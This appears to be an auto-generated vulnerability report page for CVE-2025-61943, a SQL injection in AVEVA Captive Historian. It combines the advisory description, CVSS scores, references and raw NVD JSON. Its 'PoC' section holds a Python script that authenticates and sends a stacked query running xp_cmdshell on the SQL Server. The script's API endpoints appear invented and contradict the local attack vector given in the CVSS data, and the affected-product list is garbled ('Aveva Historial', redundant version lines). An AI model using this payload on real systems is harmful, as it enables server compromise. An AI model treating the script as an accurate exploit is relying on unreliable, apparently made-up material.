Security Vulnerability Report
CVE-2025-61943 CVSS 8.4 HIGH

CVE-2025-61943

Published: 2026-01-16 02:16:45
Last Modified: 2026-01-22 15:19:42

Description

The vulnerability, if exploited, could allow an authenticated miscreant (Process Optimization Standard User) to tamper with queries in Captive Historian and achieve code execution under SQL Server administrative privileges, potentially resulting in complete compromise of the SQL Server.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:* - VULNERABLE
Aveva Historial 2020 R2 SP6 and earlier versions
Aveva Historial 2020 R2 SP5 and earlier versions
Aveva Historial 2020 R2 SP4 and earlier versions
Aveva Historial 2020 R2 SP3 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61943 PoC - SQL Injection in Aveva Captive Historian
# This PoC demonstrates SQL injection via query tampering
import requests
import json

# Configuration
target = "https://target-aveva-server.local"
cve_id = "CVE-2025-61943"

# Authentication with Process Optimization Standard User credentials
auth = {
    "username": "standard_user",
    "password": "password123"
}

# SQL Injection payload for command execution
# Note: This is a conceptual PoC. Actual exploitation requires proper authentication.
payload = {
    "query": "SELECT * FROM HistorianData WHERE TagName = 'test'; EXEC xp_cmdshell 'whoami'; --",
    "user_level": "Process Optimization Standard User"
}


# Attempt to exploit SQL injection
def exploit_sql_injection():
    session = requests.Session()

    # Login
    login_url = f"{target}/api/auth/login"
    login_response = session.post(login_url, json=auth)
    if login_response.status_code != 200:
        print(f"[-] Authentication failed")
        return None
    print(f"[+] Authenticated successfully")

    # Send malicious query
    query_url = f"{target}/api/historian/query"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": f"{cve_id} PoC"
    }
    try:
        response = session.post(query_url, json=payload, headers=headers, timeout=30)
        print(f"[*] Query sent, status: {response.status_code}")
        return response.json()
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    print(f"[*] Testing {cve_id}")
    result = exploit_sql_injection()
    if result:
        print(f"[+] Exploitation successful: {json.dumps(result, indent=2)}")
```

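References

https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json (Third Party Advisory)
https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea (Permissions Required)
https://www.aveva.com/en/support-and-success/cyber-security-updates/ (Vendor Advisory)
https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 (Third Party Advisory, US Government Resource)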

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61943", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:45.093", "lastModified": "2026-01-22T15:19:41.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an authenticated miscreant \n(Process Optimization Standard User) to tamper with queries in Captive \nHistorian and achieve code execution under SQL Server administrative \nprivileges, potentially resulting in complete compromise of the SQL \nServer."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un malhechor autenticado (Usuario Estándar de Optimización de Procesos) manipular consultas en Captive Historian y lograr la ejecución de código bajo privilegios administrativos de SQL Server, resultando potencialmente en el compromiso total del SQL Server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": 
"https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}